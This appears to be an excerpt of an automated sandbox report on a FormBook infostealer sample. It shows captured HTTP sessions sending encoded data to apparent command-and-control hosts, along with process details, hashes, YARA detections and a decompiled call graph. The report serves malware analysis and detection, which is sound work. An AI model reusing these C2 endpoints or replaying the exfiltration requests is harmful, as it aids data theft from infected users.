                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 38 77 32 58 4c 47 2f 48 44 63 37 4b 4f 44 31 66 50 56 75 39 77 74 53 30 7a 67 4d 55 77 54 71 36 65 31 4b 53 6e 62 45 39 38 6f 52 34 6f 65 4b 42 6a 4b 61 4a 51 5a 64 4f 63 34 67 2f 6f 45 30 32 4e 6b 52 77 75 6f 32 36 62 68 39 61 46 4e 73 67 4e 63 33 6d 56 38 2b 42 6c 51 75 6a 46 6b 6c 41 37 71 41 73 4d 31 53 2b 55 54 5a 4e 74 68 34 37 2b 2f 51 57 2f 58 78 62 4d 37 34 38 71 57 64 61 39 48 32 46 31 30 76 47 62 4e 53 39 76 68 2b 73 61 66 6c 69 66 35 4b 43 62 45 41 69 53 4e 53 45 77 4a 42 62 34 71 64 39 66 50 46 50 6c 32 6d 6b 35 68 53 75 33 50 77 6f 64 41 6a 53 75 31 7a 7a 6d 75 61 37 41 57 49 55 67 30 6f 50 38 57 72 42 52 44 37 73 56 67 3d 3d
                                                          Data Ascii: GBbljTO=X24/HuboROXR8w2XLG/HDc7KOD1fPVu9wtS0zgMUwTq6e1KSnbE98oR4oeKBjKaJQZdOc4g/oE02NkRwuo26bh9aFNsgNc3mV8+BlQujFklA7qAsM1S+UTZNth47+/QW/XxbM748qWda9H2F10vGbNS9vh+saflif5KCbEAiSNSEwJBb4qd9fPFPl2mk5hSu3PwodAjSu1zzmua7AWIUg0oP8WrBRD7sVg==
                                                          Jul 2, 2024 14:05:38.413938999 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:38 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          43 | 192.168.2.6 | 49767 | 191.6.208.133 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:40.237003088 CEST | 1798 | OUT | POST /2lcx/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.erosonline.com.br
                                                          Origin: http://www.erosonline.com.br
                                                          Referer: http://www.erosonline.com.br/2lcx/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Raw: 47 42 62 6c 6a 54 4f 3d 58 32 34 2f 48 75 62 6f 52 4f 58 52 38 77 32 58 4c 47 2f 48 44 63 37 4b 4f 44 31 66 50 56 75 39 77 74 53 30 7a 67 4d 55 77 51 4b 36 65 47 79 53 31 4d 77 39 39 6f 52 34 32 75 4b 52 6a 4b 61 75 51 5a 56 43 63 35 64 43 6f 43 77 32 58 42 64 77 35 71 65 36 51 68 39 61 48 4e 73 62 4a 63 32 6b 56 38 4f 46 6c 51 2b 6a 46 6b 6c 41 37 6f 49 73 4a 58 36 2b 48 6a 5a 43 36 52 34 33 76 76 51 2b 2f 57 59 67 4d 36 4d 7a 71 6d 39 61 2b 6e 6d 46 35 6d 58 47 45 39 53 2f 2f 78 2b 30 61 66 70 55 66 35 57 47 62 46 6c 48 53 4b 69 45 67 73 31 43 71 70 4e 2f 49 2f 70 55 6d 30 76 42 31 45 61 4a 36 64 42 57 56 53 37 45 73 58 7a 67 2b 4a 66 6c 45 32 4e 78 76 46 74 67 36 57 36 33 51 67 2b 6a 4b 33 4c 37 69 50 59 33 58 67 6c 55 4a 44 6a 56 70 6b 5a 63 32 74 38 6c 36 47 31 58 37 53 56 73 41 2f 5a 33 58 7a 55 36 6f 45 51 6b 44 65 55 36 6b 4b 47 69 54 2b 49 75 79 4d 34 76 6d 67 4b 33 68 41 36 75 4b 31 30 36 4d 71 6b 56 43 78 43 4c 69 4d 2b 36 55 6b 73 2b 4f 51 47 61 6e 4c 75 5a 44 44 57 6a 74 69 47 67 2f 4d [TRUNCATED]
                                                          Data Ascii: GBbljTO= [TRUNCATED]
                                                          Jul 2, 2024 14:05:41.067050934 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:40 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          44 | 192.168.2.6 | 49768 | 191.6.208.133 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:42.763941050 CEST | 487 | OUT | GET /2lcx/?mB=rL4lP&GBbljTO=a0QfEZLGBdPS9CupDmnnPsWDKzErLSGek8yDxBQcwyKMQFiimN077KRHkaCGiYerfpBHWbRAiBI+CxxxyL+dNlx1E9UxGMH9Wp+KkC7SZXFmjq4jPFSCThF16iUos8QU5jw0D9M= HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.erosonline.com.br
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:43.468678951 CEST | 727 | IN | HTTP/1.1 404 Not Found
                                                          Date: Tue, 02 Jul 2024 12:05:43 GMT
                                                          Server: Apache
                                                          Last-Modified: Thu, 24 Oct 2019 19:33:13 GMT
                                                          ETag: "1e8-595ad1aad5040"
                                                          Accept-Ranges: bytes
                                                          Content-Length: 488
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 4c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 74 2d 62 72 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 50 e1 67 69 6e 61 20 4e e3 6f 20 45 6e 63 6f 6e 74 72 61 64 61 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 26 6e 62 73 70 3b 3c 2f 70 3e 0a 3c 70 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 3c 62 3e 3c 66 6f 6e 74 [TRUNCATED]
                                                          Data Ascii: <html><head><meta http-equiv="Content-Language" content="pt-br"><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>Página Não Encontrada</title></head><body><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center">&nbsp;</p><p align="center"><b><font face="Arial" size="3">Erro 404</font></b></p><p align="center"><font face="MS Sans Serif" size="2">Página não encontrada</font></p></body></html>


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          45 | 192.168.2.6 | 49769 | 188.114.97.3 | 80 | 280 | C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Jul 2, 2024 14:05:48.583668947 CEST | 752 | OUT | POST /yhnb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 212
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=x4z8LCK3oh45cVrOu3+Jfpc9MK3Emg27offAJa2AOl+Sydt1WyTEsT0WCPx/nS4QTWlPjdeTY0P+0FqXka30RErWCeCnQQuBBCiAaf6zJ0iLqI0OubqUrOC1oXs9RJ0YI2UuuIMXVTypTUHC2zT4MbADhOi+FpeXEI630HUXgYazFtM2CstyHOU3I2RCclnh/3WlREhI5npT


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          46          192.168.2.6  49770        188.114.97.3    80                280  C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Jul 2, 2024 14:05:51.121795893 CEST  776                OUT        POST /yhnb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 236
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Data Ascii: GBbljTO=x4z8LCK3oh45e07O9QiJZJc8Dq3EtA2/ofTAJbzYJTmSy/F1XzTEgz0WKvx2qy4bTRsyjdSTY0L+0EaXlr31DkrYK+ClfwuBBCiAafudJ06Lq4kOu5SVnuCy+ns9AZ0UI2U2uJhyVV2pTUXC2iT/CbAB8+j3BZ/6Ovboqksl+u2vJ7NseftRVe01I0JwcFnL93ulDTtv2TMw28jTMgCrO/QbFm5f5h9DzQ==


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          47          192.168.2.6  49771        188.114.97.3    80                280  C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Jul 2, 2024 14:05:54.587625980 CEST  1789               OUT        POST /yhnb/ HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Accept-Encoding: gzip, deflate, br
                                                          Cache-Control: max-age=0
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          Content-Length: 1248
                                                          Host: www.cavetta.org.mt
                                                          Origin: http://www.cavetta.org.mt
                                                          Referer: http://www.cavetta.org.mt/yhnb/
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36


                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
                                                          48          192.168.2.6  49772        188.114.97.3    80                280  C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Timestamp                            Bytes transferred  Direction  Data
                                                          Jul 2, 2024 14:05:57.280318975 CEST  484                OUT        GET /yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP HTTP/1.1
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Language: en-US,en;q=0.9
                                                          Connection: close
                                                          Host: www.cavetta.org.mt
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                          Jul 2, 2024 14:05:59.260705948 CEST  1074               IN         HTTP/1.1 301 Moved Permanently
                                                          Date: Tue, 02 Jul 2024 12:05:59 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          x-powered-by: PHP/7.4.33
                                                          set-cookie: qtrans_front_language=en; expires=Wed, 02-Jul-2025 12:05:58 GMT; Max-Age=31536000; path=/
                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                          x-redirect-by: WordPress
                                                          location: http://cavetta.org.mt/yhnb/?GBbljTO=86bcI2qL6Ck2EEXjt07/da0+FqeEti6E2PrLBpyTIXPFyvdDByTjqw0HMrkRgwgyVhVHjteWGV6y9HyWgZi3RwvVIvWEZBOaOAOWOeC1I2qg94IuubjyoeGZ/2oiDpUvJToX5v0=&mB=rL4lP
                                                          x-turbo-charged-by: LiteSpeed
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zlMuYB2%2Boe5YrtX0b9Gv8XzJMo%2BhMsQX2BcUWgKHS2iob3I8XO%2BqXgdTDvudNBjBU%2BPoHTfqS24WNIgVWiVsDEE%2FVKqBfGznbchr4taMp9gUdpmd90MhVXchXuHPheBzyWAmdgM%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 89ce81cbcff47cfa-EWR
                                                          alt-svc: h3=":443"; ma=86400
                                                          Data Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Target ID:1
                                                          Start time:08:01:53
                                                          Start date:02/07/2024
                                                          Path:C:\Users\user\Desktop\hkLFB22XxS.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\hkLFB22XxS.exe"
                                                          Imagebase:0x810000
                                                          File size:1'233'920 bytes
                                                          MD5 hash:46D91DBE786E1518A8715E29F5FBA781
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          Target ID:2
                                                          Start time:08:01:54
                                                          Start date:02/07/2024
                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\hkLFB22XxS.exe"
                                                          Imagebase:0xa00000
                                                          File size:46'504 bytes
                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:true

                                                          Target ID:7
                                                          Start time:08:02:33
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe"
                                                          Imagebase:0xa00000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:08:02:34
                                                          Start date:02/07/2024
                                                          Path:C:\Windows\SysWOW64\convert.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\SysWOW64\convert.exe"
                                                          Imagebase:0x310000
                                                          File size:19'456 bytes
                                                          MD5 hash:2B1AC34AB72C95793CFE7E936F15389D
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:10
                                                          Start time:08:02:47
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe"
                                                          Imagebase:0xa00000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:11
                                                          Start time:08:02:59
                                                          Start date:02/07/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff728280000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true

                                                            Execution Graph

                                                            Execution Coverage:4.1%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:2.9%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:174
98563 817d38 __wsetenvp 98561->98563 98564 817e8c 59 API calls 98562->98564 98565 817d73 98563->98565 98566 817d4e 98563->98566 98569 817d56 _memmove 98564->98569 98568 818189 59 API calls 98565->98568 98567 818087 59 API calls 98566->98567 98567->98569 98568->98569 98569->98422 98571 820a9a __write_nolock 98570->98571 100003 816ee0 98571->100003 98573 820a9f 98574 813c26 98573->98574 100014 8212fe 89 API calls 98573->100014 98574->98418 98574->98426 98576 820aac 98576->98574 100015 824047 91 API calls Mailbox 98576->100015 98578 820ab5 98578->98574 98579 820ab9 GetFullPathNameW 98578->98579 98580 817d2c 59 API calls 98579->98580 98581 820ae5 98580->98581 98582 817d2c 59 API calls 98581->98582 98583 820af2 98582->98583 98584 817d2c 59 API calls 98583->98584 98585 8550d5 _wcscat 98583->98585 98584->98574 98587 813ac2 LoadImageW RegisterClassExW 98586->98587 98588 84d49c 98586->98588 100053 813041 7 API calls 98587->100053 100054 8148fe LoadImageW EnumResourceNamesW 98588->100054 98591 813b46 98593 8139e7 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98591->98593 98592 84d4a5 98593->98434 98595 814406 _memset 98594->98595 100055 814213 98595->100055 98606 8550ed 98605->98606 98618 820b55 98605->98618 98683->98418 98684->98430 98686 841b90 __write_nolock 98685->98686 98687 814871 GetModuleFileNameW 98686->98687 98688 817f41 59 API calls 98687->98688 98689 814897 98688->98689 98690 8148ae 60 API calls 98689->98690 98691 8148a1 Mailbox 98690->98691 98715 830ffe 98712->98715 98714 831018 98714->98461 98715->98714 98717 83101c std::exception::exception 98715->98717 98722 83594c 98715->98722 98739 8335e1 DecodePointer 98715->98739 98740 8387db RaiseException 98717->98740 98719 831046 98741 838711 58 API calls _free 98719->98741 98721 831058 98721->98461 98723 8359c7 98722->98723 98731 835958 98722->98731 98748 8335e1 DecodePointer 98723->98748 98725 8359cd 98749 838d68 58 API calls __getptd_noexit 98725->98749 98728 83598b RtlAllocateHeap 98728->98731 98738 8359bf 
